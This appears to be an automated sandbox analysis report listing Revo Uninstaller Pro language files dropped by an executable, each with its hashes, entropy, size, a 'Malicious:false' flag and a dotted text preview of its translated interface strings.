                                                                                                                                                                           Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .9.1.(.J./.A.r.a.b.i.c.....W.e.b.L.a.n.g.=.A.R.J.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...1...7.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (315), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):52512
                                                                                                                                                                          Entropy (8bit):4.15365900856631
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:FoBtEKBHU2OaI3Ky4XDv8VCdzNqyqZSD57LT+:zKBH2a2Ky4T8UzNqyqZA57LT+
                                                                                                                                                                          MD5:7B8792AD9FED507599886F0D35F18D88
                                                                                                                                                                          SHA1:81B30BFC236BE7A9CC117DE9A51E2AE9D3CD0264
                                                                                                                                                                          SHA-256:D594C865D9406920BEBF955D60D28B687A261B52299ED39DFE9E68386BFE1C7F
                                                                                                                                                                          SHA-512:18FE03947DDC9669054DA659AD4AE6A4D6B2C71283376C0E63084C309CA17431899F3355E342DA28B079C771061BC29CD42AE8369B3270F2215469A880EF4DAA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.@.a.u.e...e.v./.A.r.m.e.n.i.a.n.....W.e.b.L.a.n.g.=.a.r.m.....T.r.a.n.s.l.a.t.o.r.=.H.r.a.n.t. .O.h.a.n.y.a.n. ....... .h.r.a.n.t.o.h.a.n.y.a.n.@.m.a.i.l...a.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.2...5...9.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .O.e.}...h.....1.0.3. .=. .?.a...c.a.~.x...x...t.v.e.......1.0.4. .=. .K.v.{.k.y.....1.0.5. .=. .3.x...n.k...v.e.......1.0.6. .=. .H.P.M.....1.0.7. .=. .Q.a.v.o.h.....1.0.8. .=. .J.a...o.e...v.e.......1.0.9. .=. .D.a.v...a.t.a.}.v.....1.1.0. .=. .K.v.{.e.l.....1.1.1. .=. .K.v.{.e.l. ...a.u.l.h.....1.1.2. .=. .9.a...t.a...v.e.l.....1.1.3. .=. .K.v.{.e.^.l. .h.v.....~.a.n. .n...a.c...e...h.:.....1.1.4. .=. .K.v.{.e.^.l. .h.v.....~.a.n. .n...a.c.k...h.:.....1.1.5. .=. .;.v...v.a.i.a...t.a...x...t.....1.1.6. .=. .U.c.v.x...i.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (689), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):137338
                                                                                                                                                                          Entropy (8bit):3.822072970240457
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:6DZ2mE0Dzcyamtkk64nvy9w+gIybiSqamOsfYFyF7F5gZOgNyspNiF:6DZ2mE0FamtmmvyNSqam1YMFU7NyspoF
                                                                                                                                                                          MD5:053CBEB9CABDE4426AEED59F89415AA7
                                                                                                                                                                          SHA1:EAE9139D7A15A35D08DB7BBD138130C661D1B651
                                                                                                                                                                          SHA-256:82803769AC1663397AC87CE234B0F8C4640CDF8CACEC8FBDC4C02A0ECA1305E7
                                                                                                                                                                          SHA-512:221579B06BE0FAF79AA9EC63E1A217E8052A87306B0FB4B9377276AFA8DD70C6585C284F2485D947B06063DB7832A89BAF174DA1C361CFAD93EFCB2100A417C8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e. .=. .A.z.Y.r.b.a.y.c.a.n.c.a./.A.z.e.r.b.a.i.j.a.n.i.....W.e.b.L.a.n.g. .=. .A.Z.....T.r.a.n.s.l.a.t.o.r. .=. .M.a.h.i.r. .H.u.s.e.y.n.o.v. .(.u.r.o.b.o.r.o.s.1.3.0.8.7.5.@.g.m.a.i.l...c.o.m.). .....C.o.d.e.p.a.g.e. .=. .U.N.I.C.O.D.E. .....V.e.r.s.i.o.n. .=. .V.e.r.s.i.o.n.=.5...3...0.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .G...r...n.t.......1.0.3. .=. .A.y.a.r.l.a.r.....1.0.4. .=. .P.r.o.q.r.a.m. .s.i.l.i.c.i.....1.0.5. .=. .A.l.Y.t.l.Y.r.....1.0.6. .=. .O.v...u. .r.e.j.i.m.i.....1.0.7. .=. .S.i.y.a.h.1.....1.0.8. .=. .0.k.o.n.l.a.r.....1.0.9. .=. .T.Y.f.Y.r.r...a.t.1. .i.l.Y.....1.1.0. .=. .S.i.l.....1.1.1. .=. .G.i.r.i._.i. .S.i.l.....1.1.2. .=. .Y.e.n.i.l.Y.....1.1.3. .=. .S.i.z. . .s.e...i.l.m.i._. .e.l.e.m.e.n.t.i. .s.i.l.m.Y.k. .i.s.t.Y.d.i.y.i.n.i.z.Y. .Y.m.i.n.s.i.n.i.z.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (739), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):134822
                                                                                                                                                                          Entropy (8bit):4.091712417960198
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:l0g0yS3dFm1917yvw3q7jcVbWcCCPH0iBTkH8NgP2Hb48m++UUaQ:t0yS3dFm6DcCNf
                                                                                                                                                                          MD5:8BA1BEBEA44A0ED3D19B41847BDF014F
                                                                                                                                                                          SHA1:BD02C23FA0D0BD122AC8E461FAAE8A2A17C223AC
                                                                                                                                                                          SHA-256:15E63CF0171687BA26DAFE79D9FDFEF857D737E6C1FA0E5938F35E22C3E2BC4E
                                                                                                                                                                          SHA-512:FEF7EBEFCBDC385C40CE3A05971A4C2E1F685C0E6D78A6282D731AC1CCC2068618A9E2E16CC5D0CAE15ED5A6AEECABB0C8B11804699BE16092BF7B4B9E52353C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=........... ./.B.e.n.g.a.l.i.....W.e.b.L.a.n.g.=.B.N.....T.r.a.n.s.l.a.t.o.r.=.G.o.u.t.a.m. .R.o.y.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...............1.0.3. .=. .........................1.0.4. .=. .........................1.0.5. .=. .............1.0.6. .=. ............. ...........1.0.7. .=. .................1.0.8. .=. .....................1.0.9. .=. .......................1.1.0. .=. .....................1.1.1. .=. ............... ....... .............1.1.2. .=. .............1.1.3. .=. ......... ..... ............... ..... ......... ................... ............... ........... .......?.....1.1.4. .=. ......... ..... ............... ..... ......... ................... ................... ................. ...
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (709), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):138458
                                                                                                                                                                          Entropy (8bit):3.886109011448417
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:qyA2Mkq69Ub7gEzBB3dm0bnx06m+O0wufPduvP4BoNpRwmwQKTlZJLTXYjABYV:ZMkczBBtm0bnx06m+O0wufVuvP4BoN3F
                                                                                                                                                                          MD5:3B7AF4F26FDED0678B85A50A616C7747
                                                                                                                                                                          SHA1:32EE9D746B29C05B9C8C11617C0051A59B0DA0FD
                                                                                                                                                                          SHA-256:8C2E75D77767DF1526DEE187771C97497E46BB06AA69B80A004D4746B0401B8B
                                                                                                                                                                          SHA-512:163ADDD03C30C53C12873B84D86B9A4D28AB39B57FC822B5F3477F6659236881DC7588BAC3D745B0E93A1248156691DA20785AF32E0EDECCD1C951A1CC5DACA1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                           Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. ...J.;.3.0.@.A.:.8./.B.u.l.g.a.r.i.a.n. .....W.e.b.L.a.n.g.=.B.G.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (659), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126512
                                                                                                                                                                          Entropy (8bit):3.720605069842754
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:150RW5EH5DMXV53O2d/H+gzbtey7fvDMKd5Jpf+l9yNqaWcOIcHeG:150RW5AqXV53O2d/Hf1vDHv0ecv
                                                                                                                                                                          MD5:A1E4DAB88269A98C1EE4F4959E36A157
                                                                                                                                                                          SHA1:25F2491DE087F9C6F7D1B84E245658C19C167C91
                                                                                                                                                                          SHA-256:2C6EF86AF703BF0721025E58922BE5A780EC0AAC08DD479A88D467A87904D87C
                                                                                                                                                                          SHA-512:468508A84F689FF808A9B99BF9265D1F04FCDAEBFE798803023ED70E550835761C5A505F0BF66E78B578EA51FDECF2D2CDB4E5EAD7D7309EA3D4B01220572305
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.C.z.e.c.h.....W.e.b.L.a.n.g.=.c.z.....T.r.a.n.s.l.a.t.o.r.=.T.Y.a.s...k. .J.i.Y.......C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...2...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .Z.o.b.r.a.z.i.t.....1.0.3. .=. .N.a.s.t.a.v.e.n.......1.0.4. .=. .O.d.i.n.s.t.a.l...t.o.r.....1.0.5. .=. .N...s.t.r.o.j.e.....1.0.6. .=. .R.e.~.i.m. .l.o.v.c.e.....1.0.7. .=. .S.e.z.n.a.m.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .D.e.t.a.i.l.y.....1.1.0. .=. .O.d.i.n.s.t.a.l.o.v.a.t.....1.1.1. .=. .O.d.e.b.r.a.t. .p.o.l.o.~.k.u.....1.1.2. .=. .O.b.n.o.v.i.t.....1.1.3. .=. .O.p.r.a.v.d.u. .c.h.c.e.t.e. .o.d.e.b.r.a.t. .v.y.b.r.a.n.o.u. .p.o.l.o.~.k.u.?.....1.1.4. .=. .O.p.r.a.v.d.u. .c.h.c.e.t.e. .o.d.i.n.s.t.a.l.o.v.a.t. .v.y.b.r.a.n... .p.r.o.g.r.a.m.?.....1.1.5. .=. .A.u.t.o.a.k.t.u.a.l.i.z.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):97176
                                                                                                                                                                          Entropy (8bit):3.499969901388738
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:woFhvFocuFdycapmrOS9osFVrbmlEAicBDPGy0fr:hvFoc6dycaptSW0VrqlEAicBD+y+
                                                                                                                                                                          MD5:2B6C3675752D595B68E3E1C0A5992435
                                                                                                                                                                          SHA1:790F9E5297743509F2F5ACB575886935BB768EF4
                                                                                                                                                                          SHA-256:FA6449751FB82B79A1E4F071E5C20CF0DE86D015EDA9F0ABA347937A7F1394A2
                                                                                                                                                                          SHA-512:7F5DE4C53D39E69CBD69F27211BCA76FF7ADEB52BFFB4662136ACE6291B792D417FC9C4DEA67C1BD807788D03E427151B912E1A380D770FDEC50451D770D6BBE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .D.a.n.s.k./.D.a.n.i.s.h.....W.e.b.L.a.n.g.=.D.A.N.....T.r.a.n.s.l.a.t.o.r.=.R.e.g.m.o.s.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...5...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.....1.0.3. .=. .I.n.d.s.t.i.l.l.i.n.g.e.r.....1.0.4. .=. .A.f.i.n.s.t.a.l.l.e.r.i.n.g.....1.0.5. .=. .V...r.k.t...j.....1.0.6. .=. .J.a.g.t.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.f.i.n.s.t.a.l.l...r.....1.1.1. .=. .F.j.e.r.n. .e.m.n.e.....1.1.2. .=. .O.p.d.a.t...r.....1.1.3. .=. .V.i.l. .d.u. .f.j.e.r.n.e. .d.e.t. .v.a.l.g.t.e. .e.m.n.e.?.....1.1.4. .=. .V.i.l. .d.u. .a.f.i.n.s.t.a.l.l.e.r.e. .d.e.t. .v.a.l.g.t.e. .p.r.o.g.r.a.m.?.....1.1.5. .=. .O.p.d.a.t.e.r.i.n.g.....1.1.6. .=. .H.j...l.p.....1.1.7. .=. .H.j...
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (788), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):136212
                                                                                                                                                                          Entropy (8bit):3.4484649128879137
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:YusdiMXLgWkkKnB9jGm9ROVjB5ZegxC9WFh88ff0hUWaFZDeleeDK/4I4E4L03hA:mIyXxG
                                                                                                                                                                          MD5:170AF0E2F66875D305D9A1B5C054869B
                                                                                                                                                                          SHA1:AEB176BE7A44F890269EE45E79D5999138CD3EC6
                                                                                                                                                                          SHA-256:78386718921BC10E739CD96216F97C5F41308302A7F299B59AD76CABD8523E82
                                                                                                                                                                          SHA-512:9FBE996119EDA876C7613F759CF2BE7C86F02A9D7F382AF3F51F4CECE696C898620DFC6E9540C3541532AB0C9AC82B01297DFE1CD428E2F3AE667F0C9A7C9E59
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .N.e.d.e.r.l.a.n.d.s./.D.u.t.c.h.....W.e.b.L.a.n.g.=.N.L.....T.r.a.n.s.l.a.t.o.r.=.J.a.n. .V.e.r.h.e.i.j.e.n.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .B.e.e.l.d.....1.0.3. .=. .O.p.t.i.e.s.....1.0.4. .=. .D.e.-.i.n.s.t.a.l.l.a.t.i.e.....1.0.5. .=. .H.u.l.p.p.r.o.g.r.a.m.m.a.'.s.....1.0.6. .=. .J.a.c.h.t.m.o.d.u.s.....1.0.7. .=. .L.i.j.s.t.....1.0.8. .=. .P.i.c.t.o.g.r.a.m.m.e.n.....1.0.9. .=. .D.e.t.a.i.l.s.....1.1.0. .=. .D.e.-.i.n.s.t.a.l.l.e.r.e.n.....1.1.1. .=. .I.t.e.m. .v.e.r.w.i.j.d.e.r.e.n.....1.1.2. .=. .V.e.r.n.i.e.u.w.e.n.....1.1.3. .=. .W.e.e.t. .u. .z.e.k.e.r. .d.a.t. .u. .d.i.t. .w.i.l.t. .v.e.r.w.i.j.d.e.r.e.n.?.....1.1.4. .=. .W.e.e.t. .u. .z.e.k.e.r. .d.a.t. .u. .h.e.t. .g.e.s.e.l.e.c.t.e.e.r.d.e. .p.r.o.g.r.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (667), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126456
                                                                                                                                                                          Entropy (8bit):3.469932961281367
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:2G/KyyIrUp+ihmoqVl4hF7bPwlBB9YK3zZ1lvQ:2GiybrVCmoqVlcFvyB0Kji
                                                                                                                                                                          MD5:17CBDCF3F67B750D9E2CFB18DA7999E7
                                                                                                                                                                          SHA1:493D989BEBAED68D57FDF72660E3664EA42FD669
                                                                                                                                                                          SHA-256:5663AF4869A89B1576748A914B63DB89A79FF8374A920D288445E2D600449DCD
                                                                                                                                                                          SHA-512:2407C09A6997C15FAAD8E49C8332504F6100EF0470192235E08DC3E7D525984E5D96D2A595C846CE2A43885BDB680E2DD84D42A0F086902C5BF1216A3CCBD202
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.n.g.l.i.s.h.....W.e.b.L.a.n.g.=.E.N.G.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.e.w.....1.0.3. .=. .O.p.t.i.o.n.s.....1.0.4. .=. .U.n.i.n.s.t.a.l.l.e.r.....1.0.5. .=. .T.o.o.l.s.....1.0.6. .=. .H.u.n.t.e.r. .M.o.d.e.....1.0.7. .=. .L.i.s.t.....1.0.8. .=. .I.c.o.n.s.....1.0.9. .=. .D.e.t.a.i.l.s.....1.1.0. .=. .U.n.i.n.s.t.a.l.l.....1.1.1. .=. .R.e.m.o.v.e. .E.n.t.r.y.....1.1.2. .=. .R.e.f.r.e.s.h.....1.1.3. .=. .A.r.e. .y.o.u. .s.u.r.e. .t.h.a.t. .y.o.u. .w.a.n.t. .t.o. .r.e.m.o.v.e. .t.h.e. .s.e.l.e.c.t.e.d. .e.n.t.r.y.?.....1.1.4. .=. .A.r.e. .y.o.u. .s.u.r.e. .y.o.u. .w.a.n.t. .t.o. .u.n.i.n.s.t.a.l.l. .t.h.e. .s.e.l.e.c.t.e.d. .p.r.o.g.r.a.m.?.....1.1.5.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (552), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):102574
                                                                                                                                                                          Entropy (8bit):3.4292555280223818
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:3BS3SpCVzylFGnh/QI2WCUHgG+d5d3cKE:3BS3SpCxuFGnh/uWCSgG+d5de
                                                                                                                                                                          MD5:A71E4B0F3A6135AEF662509B9745A3B9
                                                                                                                                                                          SHA1:B0199874CE7B88C391A17B27BBC44F5683B9DC8E
                                                                                                                                                                          SHA-256:A025E5A628208C16EA79694DD99AE311674BA66039E6D09E25F9E07972D0F055
                                                                                                                                                                          SHA-512:B542383514A9E341DFD2DAF4C8107D49CA98AFBB3D7BB81E9DCF03185BFE5C9935FCF9EEC90ED979C6DF734A60899BC249F2E1B7491A5966A3FB60DDC4EA3393
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.u.o.m.i./.F.i.n.n.i.s.h.....W.e.b.L.a.n.g.=.F.I.N.....T.r.a.n.s.l.a.t.o.r.=.O.l.l.i. .(.o.l.l.i.n.p.o.s.t.i.t.@.g.m.a.i.l...c.o.m.).....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...0...8.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .N...y.t.......1.0.3. .=. .A.s.e.t.u.k.s.e.t.....1.0.4. .=. .S.o.v.e.l.l.u.s.t.e.n. .p.o.i.s.t.o.....1.0.5. .=. .T.y...k.a.l.u.t.....1.0.6. .=. .O.s.o.i.t.u.s.t.o.i.m.i.n.t.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .K.u.v.a.k.k.e.e.t.....1.0.9. .=. .T.i.e.d.o.t.....1.1.0. .=. .P.o.i.s.t.a. .s.o.v.e.l.l.u.s.....1.1.1. .=. .P.o.i.s.t.a. .r.e.k.i.s.t.e.r.i.m.e.r.k.i.n.t.......1.1.2. .=. .P...i.v.i.t... .l.u.e.t.t.e.l.o.....1.1.3. .=. .O.l.e.t.k.o. .v.a.r.m.a.,. .e.t.t... .h.a.l.u.a.t. .p.o.i.s.t.a.a. .v.a.l.i.t.u.n. .r.e.k.i.s.t.e.r.i.m.e.r.k.i.n.n.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (642), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):152860
                                                                                                                                                                          Entropy (8bit):3.44749248104316
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:joijwidVJir5Wz8dm4V2s7EaYRbuSzNDCnPzA4Ke515hQFbtjkw9TSePDYNBU31L:2gLirEz8dmQ7EaYRTgnPm7Z
                                                                                                                                                                          MD5:3231DDD2F82B85DB1CD869787928DD93
                                                                                                                                                                          SHA1:AA17C84A1228555DC351571FB85E442F92C27478
                                                                                                                                                                          SHA-256:3873A122E6E00D421913C8C85D2112C85DFBB28ABB408CB44D6DC9B56CC74CB8
                                                                                                                                                                          SHA-512:4C477FAEA63D96ABF792338070CC753EA5FBBA21E23DEEE496E085D6F5478672EA3A38B7B6286303BE3D28234CF3F94BEAB9A64918A658365DE2626E861DB43B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .F.r.a.n...a.i.s./.F.r.e.n.c.h.....W.e.b.L.a.n.g.=.F.R.A.....T.r.a.n.s.l.a.t.o.r.=...m.i.l.e. .M.o.r.v.a.n.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .A.f.f.i.c.h.a.g.e.....1.0.3. .=. .O.p.t.i.o.n.s.....1.0.4. .=. .D...s.i.n.s.t.a.l.l.e.u.r.....1.0.5. .=. .A.u.t.r.e.s. .o.u.t.i.l.s.....1.0.6. .=. .M.o.d.e. .t.r.a.q.u.e.u.r.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.c...n.e.s.....1.0.9. .=. .D...t.a.i.l.l... .....1.1.0. .=. .D...s.i.n.s.t.a.l.l.e.r.....1.1.1. .=. .S.u.p.p.r.i.m.e.r. .l.'.e.n.t.r...e.....1.1.2. .=. .R.a.f.r.a...c.h.i.r.....1.1.3. .=. .V.o.u.l.e.z.-.v.o.u.s. .v.r.a.i.m.e.n.t. .s.u.p.p.r.i.m.e.r. .l.'.e.n.t.r...e. .s...l.e.c.t.i.o.n.n...e. .?.....1.1.4. .=. .V.o.u.l.e.z.-.v.o.u.s. .v.r.a.i.m.e.n.t. .d...s.i.
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (551), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):150688
                                                                                                                                                                          Entropy (8bit):3.487331298408884
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:NzGb5p5B0vDcOQywq61+EgpHuOmZ1of41S7aDB5ag+Jkb3bQkzMjPjXg8iM3qQoU:yT0
                                                                                                                                                                          MD5:C333FD6BEDC812B8492B9068E3DFA7B5
                                                                                                                                                                          SHA1:322DDA605843896F8EA76997EC6274E44BF2C9F5
                                                                                                                                                                          SHA-256:6443FDA6F0A0FB4F99329962A1B09CAF3BF8568C74FC9D6EEBA1302A0C29300E
                                                                                                                                                                          SHA-512:7159FF7743DA3B3B62098FC2370E4AFD26980214EBD34C76F515BA553632DD5025B78C3389E53D064710C64A1B1BB2987055EFBC8C8256F10478F22BC375A15E
                                                                                                                                                                          Malicious:false
